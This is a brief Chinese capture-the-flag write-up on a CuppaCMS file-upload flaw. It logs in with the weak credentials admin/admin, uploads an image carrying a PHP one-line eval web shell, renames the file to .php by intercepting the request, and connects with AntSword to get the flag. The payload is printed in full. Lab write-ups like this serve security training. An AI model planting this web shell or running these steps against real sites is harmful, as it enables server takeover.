简介
CuppaCMS是一套内容管理系统(CMS)。 CuppaCMS 2019-11-12之前版本存在安全漏洞,攻击者可利用该漏洞在图像扩展内上传恶意文件,通过使用文件管理器提供的重命名函数的自定义请求,可以将图像扩展修改为PHP,从而导致远程任意代码执行。
正文
1.进入靶场
2.弱口令登录admin\admin
3.上传一句话木马图片
<?php @eval($_POST['cmd']);?>
4.删除配置文件
5.重命名图片,抓包更改文件后缀
6.蚁剑连接
7.得到flag
相关推荐
guanyue.space21 分钟前
网站可疑问题Hugo_McQueen1 小时前
pWnos1.0 靶机渗透 (Perl CGI 的反弹 shell 利用)小小工匠1 小时前
Web安全 - 路径穿越(Path Traversal)学习溢出3 小时前
深入了解 net user 命令:上一次是谁登录的?不灭锦鲤4 小时前
ssrf学习(ctfhub靶场)鲨鱼辣椒丶D4 小时前
「漏洞复现」用友U8 CRM config/fillbacksettingedit.php SQL注入漏洞网络研究院6 小时前
如何安全地大规模部署 GenAI 应用程序DonciSacer10 小时前
TryHackMe 第6天 | Web Fundamentals (一)云卓科技14 小时前
无人机之数据提取篇山兔114 小时前
工控安全防护机制与技术